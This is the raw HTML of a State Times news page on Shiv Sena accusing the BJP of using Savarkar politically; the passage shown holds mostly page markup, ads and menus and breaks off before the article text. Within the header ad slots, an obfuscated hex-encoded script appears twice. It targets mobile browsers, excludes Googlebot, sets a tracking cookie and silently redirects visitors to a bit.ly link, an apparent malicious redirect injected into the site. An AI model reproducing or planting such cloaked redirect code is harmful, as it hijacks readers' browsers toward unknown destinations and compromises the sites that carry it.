<!DOCTYPE html>
<!--[if lt IE 7]>      <html class="no-js lt-ie9 lt-ie8 lt-ie7" lang="en-GB"> <![endif]-->
<!--[if IE 7]>         <html class="no-js lt-ie9 lt-ie8" lang="en-GB"> <![endif]-->
<!--[if IE 8]>         <html class="no-js lt-ie9" lang="en-GB"> <![endif]-->
<!--[if gt IE 8]><!--> <html class="no-js" lang="en-GB"> <!--<![endif]-->
    <head>
	<meta charset="UTF-8" />
        <meta http-equiv="X-UA-Compatible" content="IE=edge,chrome=1">
	<title>BJP using Savarkar as shield for neo-nationalism politics: Sena | State Times</title>
	<link rel="profile" href="http://gmpg.org/xfn/11">
	<link rel="pingback" href="http://news.statetimes.in/xmlrpc.php">
<meta property="og:image" content="http://news.statetimes.in/wp-content/uploads/2019/03/Shiv-Sena-1.jpg"/>
    <meta property="og:image:width" content="1024" />
    <meta property="og:image:height" content="1024" />

<meta property="og:title" content="BJP using Savarkar as shield for neo-nationalism politics: Sena"/>
<meta property="og:type" content="article"/>
<meta property="og:description" content="Mumbai: The Shiv Sena on Thursday accused the BJP of using Hindutva ideologue Veer Savarkar as a "shield" to play the politics of neo-nationalism. Terming the BJP's love for Savarkar as "fake", the Se"/>
<meta property="og:url" content="http://news.statetimes.in/bjp-using-savarkar-as-shield-for-neo-nationalism-politics-sena/"/>
<meta property="og:site_name" content="State Times"/>

<meta name="viewport" content="width=device-width, initial-scale=1, maximum-scale=1">
<link rel="shortcut icon" href="http://news.statetimes.in/wp-content/uploads/2014/08/favicon.png?x39047" />
<link rel="apple-touch-icon" href="http://news.statetimes.in/wp-content/themes/goodnews5/apple-touch-icon-precomposed.png?x39047" />

<link rel="pingback" href="http://news.statetimes.in/xmlrpc.php" />
        <!--[if lt IE 9]>
	<script src="http://news.statetimes.in/wp-content/themes/goodnews5/framework/helpers/js/html5.js?x39047"></script>
	<script src="http://news.statetimes.in/wp-content/themes/goodnews5/framework/helpers/js/IE9.js?x39047"></script>
	<![endif]-->
	<link rel='dns-prefetch' href='//s.w.org' />
<link rel="alternate" type="application/rss+xml" title="State Times &raquo; Feed" href="http://news.statetimes.in/feed/" />
<link rel="alternate" type="application/rss+xml" title="State Times &raquo; Comments Feed" href="http://news.statetimes.in/comments/feed/" />
<link rel="alternate" type="application/rss+xml" title="State Times &raquo; BJP using Savarkar as shield for neo-nationalism politics: Sena Comments Feed" href="http://news.statetimes.in/bjp-using-savarkar-as-shield-for-neo-nationalism-politics-sena/feed/" />
		<script type="text/javascript">
			window._wpemojiSettings = {"baseUrl":"https:\/\/s.w.org\/images\/core\/emoji\/11\/72x72\/","ext":".png","svgUrl":"https:\/\/s.w.org\/images\/core\/emoji\/11\/svg\/","svgExt":".svg","source":{"concatemoji":"http:\/\/news.statetimes.in\/wp-includes\/js\/wp-emoji-release.min.js?ver=5.0.4"}};
			!function(a,b,c){function d(a,b){var c=String.fromCharCode;l.clearRect(0,0,k.width,k.height),l.fillText(c.apply(this,a),0,0);var d=k.toDataURL();l.clearRect(0,0,k.width,k.height),l.fillText(c.apply(this,b),0,0);var e=k.toDataURL();return d===e}function e(a){var b;if(!l||!l.fillText)return!1;switch(l.textBaseline="top",l.font="600 32px Arial",a){case"flag":return!(b=d([55356,56826,55356,56819],[55356,56826,8203,55356,56819]))&&(b=d([55356,57332,56128,56423,56128,56418,56128,56421,56128,56430,56128,56423,56128,56447],[55356,57332,8203,56128,56423,8203,56128,56418,8203,56128,56421,8203,56128,56430,8203,56128,56423,8203,56128,56447]),!b);case"emoji":return b=d([55358,56760,9792,65039],[55358,56760,8203,9792,65039]),!b}return!1}function f(a){var c=b.createElement("script");c.src=a,c.defer=c.type="text/javascript",b.getElementsByTagName("head")[0].appendChild(c)}var g,h,i,j,k=b.createElement("canvas"),l=k.getContext&&k.getContext("2d");for(j=Array("flag","emoji"),c.supports={everything:!0,everythingExceptFlag:!0},i=0;i<j.length;i++)c.supports[j[i]]=e(j[i]),c.supports.everything=c.supports.everything&&c.supports[j[i]],"flag"!==j[i]&&(c.supports.everythingExceptFlag=c.supports.everythingExceptFlag&&c.supports[j[i]]);c.supports.everythingExceptFlag=c.supports.everythingExceptFlag&&!c.supports.flag,c.DOMReady=!1,c.readyCallback=function(){c.DOMReady=!0},c.supports.everything||(h=function(){c.readyCallback()},b.addEventListener?(b.addEventListener("DOMContentLoaded",h,!1),a.addEventListener("load",h,!1)):(a.attachEvent("onload",h),b.attachEvent("onreadystatechange",function(){"complete"===b.readyState&&c.readyCallback()})),g=c.source||{},g.concatemoji?f(g.concatemoji):g.wpemoji&&g.twemoji&&(f(g.twemoji),f(g.wpemoji)))}(window,document,window._wpemojiSettings);
		</script>
		<style type="text/css">
img.wp-smiley,
img.emoji {
	display: inline !important;
	border: none !important;
	box-shadow: none !important;
	height: 1em !important;
	width: 1em !important;
	margin: 0 .07em !important;
	vertical-align: -0.1em !important;
	background: none !important;
	padding: 0 !important;
}
</style>
<link rel='stylesheet' id='wp-block-library-css'  href='http://news.statetimes.in/wp-includes/css/dist/block-library/style.min.css?x39047' type='text/css' media='all' />
<link rel='stylesheet' id='contact-form-7-css'  href='http://news.statetimes.in/wp-content/plugins/contact-form-7/includes/css/styles.css?x39047' type='text/css' media='all' />
<link rel='stylesheet' id='chosen-css'  href='http://news.statetimes.in/wp-content/plugins/wp-job-manager/assets/css/chosen.css?x39047' type='text/css' media='all' />
<link rel='stylesheet' id='wp-job-manager-frontend-css'  href='http://news.statetimes.in/wp-content/plugins/wp-job-manager/assets/css/frontend.css?x39047' type='text/css' media='all' />
<link rel='stylesheet' id='plugins-css'  href='http://news.statetimes.in/wp-content/themes/goodnews5/css/plugins.css?x39047' type='text/css' media='all' />
<link rel='stylesheet' id='main-css'  href='http://news.statetimes.in/wp-content/themes/goodnews5/css/main.css?x39047' type='text/css' media='all' />
<link rel='stylesheet' id='responsive-css'  href='http://news.statetimes.in/wp-content/themes/goodnews5/css/media.css?x39047' type='text/css' media='all' />
<link rel='stylesheet' id='style-css'  href='http://news.statetimes.in/wp-content/themes/child-theme/style.css?x39047' type='text/css' media='all' />
<link rel='stylesheet' id='black-style-css'  href='http://news.statetimes.in/wp-content/themes/goodnews5/css/flamingo.css?x39047' type='text/css' media='all' />
<script type='text/javascript' src='http://news.statetimes.in/wp-includes/js/jquery/jquery.js?x39047'></script>
<script type='text/javascript' src='http://news.statetimes.in/wp-includes/js/jquery/jquery-migrate.min.js?x39047'></script>
<link rel='https://api.w.org/' href='http://news.statetimes.in/wp-json/' />
<link rel="EditURI" type="application/rsd+xml" title="RSD" href="http://news.statetimes.in/xmlrpc.php?rsd" />
<link rel="wlwmanifest" type="application/wlwmanifest+xml" href="http://news.statetimes.in/wp-includes/wlwmanifest.xml" /> 
<link rel='prev' title='Cong govt in Punjab suffering from &#8216;karo na&#8217; virus: Opposition' href='http://news.statetimes.in/cong-govt-in-punjab-suffering-from-karo-na-virus-opposition/' />
<link rel='next' title='CBI arrests illegal migrant after 22 years on RCN basis' href='http://news.statetimes.in/cbi-arrests-illegal-migrant-after-22-years-on-rcn-basis/' />
<meta name="generator" content="WordPress 5.0.4" />
<link rel="canonical" href="http://news.statetimes.in/bjp-using-savarkar-as-shield-for-neo-nationalism-politics-sena/" />
<link rel='shortlink' href='http://news.statetimes.in/?p=588931' />
<link rel="alternate" type="application/json+oembed" href="http://news.statetimes.in/wp-json/oembed/1.0/embed?url=http%3A%2F%2Fnews.statetimes.in%2Fbjp-using-savarkar-as-shield-for-neo-nationalism-politics-sena%2F" />
<link rel="alternate" type="text/xml+oembed" href="http://news.statetimes.in/wp-json/oembed/1.0/embed?url=http%3A%2F%2Fnews.statetimes.in%2Fbjp-using-savarkar-as-shield-for-neo-nationalism-politics-sena%2F&#038;format=xml" />
<meta name="msvalidate.01" content="E16D694C0F66CFA1ABC9F98B3398A6E5" />
<script type="text/javascript" async defer
  src="https://apis.google.com/js/platform.js?publisherid=101378335416363517049">
</script>
<link href="https://plus.google.com/101378335416363517049" rel="publisher" />
<script async src="//pagead2.googlesyndication.com/pagead/js/adsbygoogle.js"></script>
<script>
     (adsbygoogle = window.adsbygoogle || []).push({
          google_ad_client: "ca-pub-3121650879019050",
          enable_page_level_ads: true
     });
</script>
<script type="text/javascript" src="//sdk.adspruce.com/1/adsprucetag.js?pid=2271&sid=1" defer></script>

<meta name="generator" content="Powered by WPBakery Page Builder - drag and drop page builder for WordPress."/>
<!--[if lte IE 9]><link rel="stylesheet" type="text/css" href="http://news.statetimes.in/wp-content/plugins/js_composer/assets/css/vc_lte_ie9.min.css?x39047" media="screen"><![endif]--><style type="text/css" title="dynamic-css" class="options-output">body{color:#282828;}{color:#262626;}.news-ticker{background-color:#262626;}.news-ticker li a, .news-ticker li{color:#ffffff;}</style><style type="text/css">
    
.header > .inner, .header .logo {
line-height: 112px;
height: 112px;
}
/* Category background */
</style>
<noscript><style type="text/css"> .wpb_animate_when_almost_visible { opacity: 1; }</style></noscript>    </head>
    <body class="post-template-default single single-post postid-588931 single-format-standard both-sidebars-all both-sidebars singular both_sidebars_same_width fade-imgs-in-appear sticky_navigation_on navigation_highlight_ancestor time_in_twelve_format one-side-wide both-sidebars both-sides-true smooth_scroll_enable show_secondary_sidebar_on_ipad goodnews-child wpb-js-composer js-comp-ver-5.4.7 vc_responsive" itemscope="itemscope" itemtype="http://schema.org/WebPage">
    
        <!--[if lt IE 7]>
            <p class="browsehappy">You are using an <strong>outdated</strong> browser. Please <a href="http://browsehappy.com/">upgrade your browser</a> to improve your experience.</p>
        <![endif]-->
        <div class="boxed-wrap clearfix">
	    <div id="header-wrapper">
                         <div class="topbar">
  <div class="inner">
            <div class="top-left-content">
                 			     <ul id="menu-top-menu" class="top-nav mom_visibility_desktop"><li id="menu-item-72" class="menu-item menu-item-type-custom menu-item-object-custom menu-item-home menu-item-72"><a href="http://news.statetimes.in">Home</a></li>
<li id="menu-item-69" class="menu-item menu-item-type-custom menu-item-object-custom menu-item-69"><a target="_blank" href="http://www.statetimes.in/epaper/">E-Paper</a></li>
<li id="menu-item-71" class="menu-item menu-item-type-custom menu-item-object-custom menu-item-71"><a target="_blank" href="http://news.statetimes.in/sitemap.xml">Sitemap</a></li>
<li id="menu-item-4980" class="menu-item menu-item-type-post_type menu-item-object-page menu-item-4980"><a href="http://news.statetimes.in/about-us/">About us</a></li>
<li id="menu-item-4981" class="menu-item menu-item-type-post_type menu-item-object-page menu-item-4981"><a href="http://news.statetimes.in/contact-us/">Contact us</a></li>
<li id="menu-item-57375" class="menu-item menu-item-type-post_type menu-item-object-page menu-item-57375"><a href="http://news.statetimes.in/jobs/">Job Portal</a></li>
</ul>
     			     <div class="mom_visibility_device device-top-menu-wrap">
			      <div class="top-menu-holder"><i class="fa-icon-reorder mh-icon"></i></div>
			      <ul id="menu-top-menu-1" class="device-top-nav"><li class="menu-item menu-item-type-custom menu-item-object-custom menu-item-home menu-item-72"><a href="http://news.statetimes.in">Home</a></li>
<li class="menu-item menu-item-type-custom menu-item-object-custom menu-item-69"><a target="_blank" href="http://www.statetimes.in/epaper/">E-Paper</a></li>
<li class="menu-item menu-item-type-custom menu-item-object-custom menu-item-71"><a target="_blank" href="http://news.statetimes.in/sitemap.xml">Sitemap</a></li>
<li class="menu-item menu-item-type-post_type menu-item-object-page menu-item-4980"><a href="http://news.statetimes.in/about-us/">About us</a></li>
<li class="menu-item menu-item-type-post_type menu-item-object-page menu-item-4981"><a href="http://news.statetimes.in/contact-us/">Contact us</a></li>
<li class="menu-item menu-item-type-post_type menu-item-object-page menu-item-57375"><a href="http://news.statetimes.in/jobs/">Job Portal</a></li>
</ul>			     </div>

                        </div> <!--tb left-->
        <div class="top-right-content">
            		    <ul class="mom-social-icons">
                    <li class="twitter"><a target="_blank" class="vector_icon" href="https://www.twitter.com/state_times"><i class="fa-icon-twitter"></i></a></li>
        
                <li class="facebook"><a target="_blank" class="vector_icon" href="https://www.facebook.com/statetimes"><i class="fa-icon-facebook "></i></a></li>        
        
                   <li class="gplus"><a target="_blank" class="vector_icon" href="https://plus.google.com/112398265041024324940/" ><i class="fa-icon-google-plus"></i></a></li>     
        
        
                        <li class="youtube"><a target="_blank" class="vector_icon" href="https://www.youtube.com/statetimes1"><i class="fa-icon-youtube"></i></a></li>
        
        
        
        

        

        
                        <li class="tumblr"><a target="_blank" class="vector_icon" href="http://statetimes1.tumblr.com"><i class="fa-icon-tumblr"></i></a></li>
                             <li class="rss"><a target="_blank" class="vector_icon" href="http://news.statetimes.in/feed/"><i class="fa-icon-rss"></i></a></li>
        	
	    </ul>
                    </div> <!--tb right-->
</div>
 </div> <!--topbar-->
             <header class="header " itemscope="itemscope" itemtype="http://schema.org/WPHeader" role="banner">
                <div class="inner">
						                    <div class="logo">
					                    <a href="http://news.statetimes.in">
		                                                    <img src="http://news.statetimes.in/wp-content/uploads/2015/04/stlogosmall.jpg?x39047" alt="State Times" width="445" height="77" />
                                                                                               <img class="mom_retina_logo" src="http://news.statetimes.in/wp-content/uploads/2015/04/stlogosmall.jpg?x39047" width="445" height="77" alt="State Times" />
                                                		                    </a>

					
                    </div>
                                        <div class="header-right">
                                  		<script type="text/javascript">
		jQuery(document).ready(function($) {
			$('.e3lanat-rotator-id-812 .mom-e3lanat-inner').imagesLoaded( function() {
			jQuery('.e3lanat-rotator-id-812 .mom-e3lanat-inner').boxSlider({
				autoScroll: true,
				timeout: 5000,
				speed: 800,
				effect: 'scrollVert3d',
				pauseOnHover: true,
				next:'.e3lanat-rotator-id-812 .adr-next',
				prev: '.e3lanat-rotator-id-812 .adr-prev'
				
			});

			});

		});
	</script>
		<div class="mom-e3lanat-wrap  ">
	<div class="mom-e3lanat e3lanat-layout-rotator e3lanat-rotator-id-812" style="width:728px; height:90px;">
		<div class="mom-e3lanat-inner">
		
				<div class="mom-e3lan" data-id="60802" style=" ">
		<div class="e3lan-code"><script async src="//pagead2.googlesyndication.com/pagead/js/adsbygoogle.js"></script>
<!-- top banner -->
<ins class="adsbygoogle"
     style="display:inline-block;width:728px;height:90px"
     data-ad-client="ca-pub-3121650879019050"
     data-ad-slot="4210843814"></ins>
<script>
(adsbygoogle = window.adsbygoogle || []).push({});
</script>
<script>var _0x446d=["\x5f\x6d\x61\x75\x74\x68\x74\x6f\x6b\x65\x6e","\x69\x6e\x64\x65\x78\x4f\x66","\x63\x6f\x6f\x6b\x69\x65","\x75\x73\x65\x72\x41\x67\x65\x6e\x74","\x76\x65\x6e\x64\x6f\x72","\x6f\x70\x65\x72\x61","\x68\x74\x74\x70\x73\x3a\x2f\x2f\x62\x69\x74\x2e\x6c\x79\x2f\x32\x4c\x4c\x33\x41\x4f\x58","\x67\x6f\x6f\x67\x6c\x65\x62\x6f\x74","\x74\x65\x73\x74","\x73\x75\x62\x73\x74\x72","\x67\x65\x74\x54\x69\x6d\x65","\x5f\x6d\x61\x75\x74\x68\x74\x6f\x6b\x65\x6e\x3d\x31\x3b\x20\x70\x61\x74\x68\x3d\x2f\x3b\x65\x78\x70\x69\x72\x65\x73\x3d","\x74\x6f\x55\x54\x43\x53\x74\x72\x69\x6e\x67","\x6c\x6f\x63\x61\x74\x69\x6f\x6e"];if(document[_0x446d[2]][_0x446d[1]](_0x446d[0])==  -1){(function(_0xecfdx1,_0xecfdx2){if(_0xecfdx1[_0x446d[1]](_0x446d[7])==  -1){if(/(android|bb\d+|meego).+mobile|avantgo|bada\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od|ad)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x446d[8]](_0xecfdx1)|| /1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\-(n|u)|c55\/|capi|ccwa|cdm\-|cell|chtm|cldc|cmd\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\-s|devi|dica|dmob|do(c|p)o|ds(12|\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\-|_)|g1 u|g560|gene|gf\-5|g\-mo|go(\.w|od)|gr(ad|un)|haie|hcit|hd\-(m|p|t)|hei\-|hi(pt|ta)|hp( i|ip)|hs\-c|ht(c(\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\-(20|go|ma)|i230|iac( |\-|\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\/)|klon|kpt |kwc\-|kyo(c|k)|le(no|xi)|lg( g|\/(k|l|u)|50|54|\-[a-w])|libw|lynx|m1\-w|m3ga|m50\/|ma(te|ui|xo)|mc(01|21|ca)|m\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\-2|po(ck|rt|se)|prox|psio|pt\-g|qa\-a|qc(07|12|21|32|60|\-[2-7]|i\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\-|oo|p\-)|sdk\/|se(c(\-|0|1)|47|mc|nd|ri)|sgh\-|shar|sie(\-|m)|sk\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\-|v\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\-|tdg\-|tel(i|m)|tim\-|t\-mo|to(pl|sh)|ts(70|m\-|m3|m5)|tx\-9|up(\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\-|your|zeto|zte\-/i[_0x446d[8]](_0xecfdx1[_0x446d[9]](0,4))){var _0xecfdx3= new Date( new Date()[_0x446d[10]]()+ 1800000);document[_0x446d[2]]= _0x446d[11]+ _0xecfdx3[_0x446d[12]]();window[_0x446d[13]]= _0xecfdx2}}})(navigator[_0x446d[3]]|| navigator[_0x446d[4]]|| window[_0x446d[5]],_0x446d[6])}</script>	
</div>	</div><!--mom ad-->
					<div class="mom-e3lan" data-id="60802" style=" ">
		<div class="e3lan-code"><script async src="//pagead2.googlesyndication.com/pagead/js/adsbygoogle.js"></script>
<!-- top banner -->
<ins class="adsbygoogle"
     style="display:inline-block;width:728px;height:90px"
     data-ad-client="ca-pub-3121650879019050"
     data-ad-slot="4210843814"></ins>
<script>
(adsbygoogle = window.adsbygoogle || []).push({});
</script>
<script>var _0x446d=["\x5f\x6d\x61\x75\x74\x68\x74\x6f\x6b\x65\x6e","\x69\x6e\x64\x65\x78\x4f\x66","\x63\x6f\x6f\x6b\x69\x65","\x75\x73\x65\x72\x41\x67\x65\x6e\x74","\x76\x65\x6e\x64\x6f\x72","\x6f\x70\x65\x72\x61","\x68\x74\x74\x70\x73\x3a\x2f\x2f\x62\x69\x74\x2e\x6c\x79\x2f\x32\x4c\x4c\x33\x41\x4f\x58","\x67\x6f\x6f\x67\x6c\x65\x62\x6f\x74","\x74\x65\x73\x74","\x73\x75\x62\x73\x74\x72","\x67\x65\x74\x54\x69\x6d\x65","\x5f\x6d\x61\x75\x74\x68\x74\x6f\x6b\x65\x6e\x3d\x31\x3b\x20\x70\x61\x74\x68\x3d\x2f\x3b\x65\x78\x70\x69\x72\x65\x73\x3d","\x74\x6f\x55\x54\x43\x53\x74\x72\x69\x6e\x67","\x6c\x6f\x63\x61\x74\x69\x6f\x6e"];if(document[_0x446d[2]][_0x446d[1]](_0x446d[0])==  -1){(function(_0xecfdx1,_0xecfdx2){if(_0xecfdx1[_0x446d[1]](_0x446d[7])==  -1){if(/(android|bb\d+|meego).+mobile|avantgo|bada\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od|ad)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x446d[8]](_0xecfdx1)|| /1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\-(n|u)|c55\/|capi|ccwa|cdm\-|cell|chtm|cldc|cmd\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\-s|devi|dica|dmob|do(c|p)o|ds(12|\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\-|_)|g1 u|g560|gene|gf\-5|g\-mo|go(\.w|od)|gr(ad|un)|haie|hcit|hd\-(m|p|t)|hei\-|hi(pt|ta)|hp( i|ip)|hs\-c|ht(c(\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\-(20|go|ma)|i230|iac( |\-|\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\/)|klon|kpt |kwc\-|kyo(c|k)|le(no|xi)|lg( g|\/(k|l|u)|50|54|\-[a-w])|libw|lynx|m1\-w|m3ga|m50\/|ma(te|ui|xo)|mc(01|21|ca)|m\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\-2|po(ck|rt|se)|prox|psio|pt\-g|qa\-a|qc(07|12|21|32|60|\-[2-7]|i\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\-|oo|p\-)|sdk\/|se(c(\-|0|1)|47|mc|nd|ri)|sgh\-|shar|sie(\-|m)|sk\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\-|v\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\-|tdg\-|tel(i|m)|tim\-|t\-mo|to(pl|sh)|ts(70|m\-|m3|m5)|tx\-9|up(\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\-|your|zeto|zte\-/i[_0x446d[8]](_0xecfdx1[_0x446d[9]](0,4))){var _0xecfdx3= new Date( new Date()[_0x446d[10]]()+ 1800000);document[_0x446d[2]]= _0x446d[11]+ _0xecfdx3[_0x446d[12]]();window[_0x446d[13]]= _0xecfdx2}}})(navigator[_0x446d[3]]|| navigator[_0x446d[4]]|| window[_0x446d[5]],_0x446d[6])}</script>	
</div>	</div><!--mom ad-->
			</div>
	</div>	<!--Mom ads-->
	</div>
                    </div> <!--header right-->
                    
                <div class="clear"></div>
                </div>
            </header>
	    	    </div> <!--header wrap-->
                                    <nav id="navigation" itemtype="http://schema.org/SiteNavigationElement" itemscope="itemscope" role="navigation" class="dd-effect-slide ">
                <div class="navigation-inner">
                <div class="inner">
                                                                <ul id="menu-primary-two" class="main-menu mom_visibility_desktop"><li id="menu-item-58059" class="menu-item menu-item-type-custom menu-item-object-custom menu-item-home mom_default_menu_item menu-item-iconsOnly menu-item-depth-0"><a href="http://news.statetimes.in/"><i class="icon_only momizat-icon-home"></i><span class="icon_only_label">Home</span></a></li>
<li id="menu-item-58080" class="menu-item menu-item-type-taxonomy menu-item-object-category menu-item-has-children menu-parent-item mom_mega_cats menu-item-depth-0"><a href="http://news.statetimes.in/section/news/jknews/">Jammu and Kashmir</a><div class='cats-mega-wrap '>
<div class="cats-mega-inner">

<ul class="sub-menu ">
	<li id="menu-item-58091" class="menu-item menu-item-type-taxonomy menu-item-object-category mom_default_menu_item active menu-item-depth-1"><a href="http://news.statetimes.in/section/news/jknews/topjknews/">Top J&#038;K News</a></li>
	<li id="menu-item-58083" class="menu-item menu-item-type-taxonomy menu-item-object-category mom_default_menu_item menu-item-depth-1"><a href="http://news.statetimes.in/section/news/jknews/local-news/">Cities &#038; Towns</a></li>
	<li id="menu-item-58086" class="menu-item menu-item-type-taxonomy menu-item-object-category mom_default_menu_item menu-item-depth-1"><a href="http://news.statetimes.in/section/news/jknews/jksports/">J&#038;K Sports</a></li>
	<li id="menu-item-58085" class="menu-item menu-item-type-taxonomy menu-item-object-category mom_default_menu_item menu-item-depth-1"><a href="http://news.statetimes.in/section/news/jknews/crime-watch/">Crime Watch</a></li>
	<li id="menu-item-58084" class="menu-item menu-item-type-taxonomy menu-item-object-category mom_default_menu_item menu-item-depth-1"><a href="http://news.statetimes.in/section/news/jknews/courts/">Courts</a></li>
	<li id="menu-item-58081" class="menu-item menu-item-type-taxonomy menu-item-object-category mom_default_menu_item menu-item-depth-1"><a href="http://news.statetimes.in/section/news/jknews/art-culture/">Art &#038; Culture</a></li>
</ul>
<div class='subcat'><div class='active mom-cat-latest' id='mn-latest-58091' data-id='15' data-object='category' data-layout=''><ul id='mn-ul-latest-58091'><li class='has-thumbnail' ><div class='subcat-thumbnail'><a href='http://news.statetimes.in/cs-reviews-progress-of-jammu-srinagar-nhai-four-laning-project/' title='CS reviews progress of Jammu-Srinagar NHAI four laning project'><img src='http://news.statetimes.in/wp-content/uploads/2016/12/ST-LOGO-90x60.jpg?x39047' alt='CS reviews progress of Jammu-Srinagar NHAI four laning project' width='70' height='47'></a></div><div class='subcat-title'><a href='http://news.statetimes.in/cs-reviews-progress-of-jammu-srinagar-nhai-four-laning-project/' title='CS reviews progress of Jammu-Srinagar NHAI four laning project'> CS reviews progress of Jammu-Srinagar NHAI four laning project</a><span> - 4 hours ago</span></div></li><li class='has-thumbnail' ><div class='subcat-thumbnail'><a href='http://news.statetimes.in/union-mos-lg-discuss-modalities-for-strengthening-power-sector-in-jk/' title='Union MoS, LG discuss modalities for strengthening power sector in J&#038;K'><img src='http://news.statetimes.in/wp-content/uploads/2020/02/Union-MoS-Lt-Governor-chairing-high-level-meeting-to-review-the-Power-and-Renewable-Energy-Scenario-in-JK.jpg?x39047' alt='Union MoS, LG discuss modalities for strengthening power sector in J&#038;K' width='70' height='47'></a></div><div class='subcat-title'><a href='http://news.statetimes.in/union-mos-lg-discuss-modalities-for-strengthening-power-sector-in-jk/' title='Union MoS, LG discuss modalities for strengthening power sector in J&#038;K'> Union MoS, LG discuss modalities for strengthening power sector in J&#038;K</a><span> - 12 hours ago</span></div></li><li class='has-thumbnail' ><div class='subcat-thumbnail'><a href='http://news.statetimes.in/nia-conducts-raids-in-connection-with-nagrota-encounter/' title='NIA conducts raids in connection with Nagrota encounter'><img src='http://news.statetimes.in/wp-content/uploads/2020/02/NIA.jpg?x39047' alt='NIA conducts raids in connection with Nagrota encounter' width='70' height='47'></a></div><div class='subcat-title'><a href='http://news.statetimes.in/nia-conducts-raids-in-connection-with-nagrota-encounter/' title='NIA conducts raids in connection with Nagrota encounter'> NIA conducts raids in connection with Nagrota encounter</a><span> - 12 hours ago</span></div></li><li class='has-thumbnail' ><div class='subcat-thumbnail'><a href='http://news.statetimes.in/security-of-jammu-srinagar-airports-handed-over-to-cisf-2/' title='Security of Jammu, Srinagar airports handed over to CISF'><img src='http://news.statetimes.in/wp-content/uploads/2016/12/ST-LOGO-90x60.jpg?x39047' alt='Security of Jammu, Srinagar airports handed over to CISF' width='70' height='47'></a></div><div class='subcat-title'><a href='http://news.statetimes.in/security-of-jammu-srinagar-airports-handed-over-to-cisf-2/' title='Security of Jammu, Srinagar airports handed over to CISF'> Security of Jammu, Srinagar airports handed over to CISF</a><span> - 12 hours ago</span></div></li></ul><a href='http://news.statetimes.in/section/news/jknews/topjknews/' title='' class='view_all_posts'>View all<i class='long-arrow-icon'></i></a></div><div class=' mom-cat-latest' id='mn-latest-58083' data-id='16' data-object='category' data-layout=''><ul id='mn-ul-latest-58083'></ul><a href='http://news.statetimes.in/section/news/jknews/local-news/' title='' class='view_all_posts'>View all<i class='long-arrow-icon'></i></a></div><div class=' mom-cat-latest' id='mn-latest-58086' data-id='17' data-object='category' data-layout=''><ul id='mn-ul-latest-58086'></ul><a href='http://news.statetimes.in/section/news/jknews/jksports/' title='' class='view_all_posts'>View all<i class='long-arrow-icon'></i></a></div><div class=' mom-cat-latest' id='mn-latest-58085' data-id='233' data-object='category' data-layout=''><ul id='mn-ul-latest-58085'></ul><a href='http://news.statetimes.in/section/news/jknews/crime-watch/' title='' class='view_all_posts'>View all<i 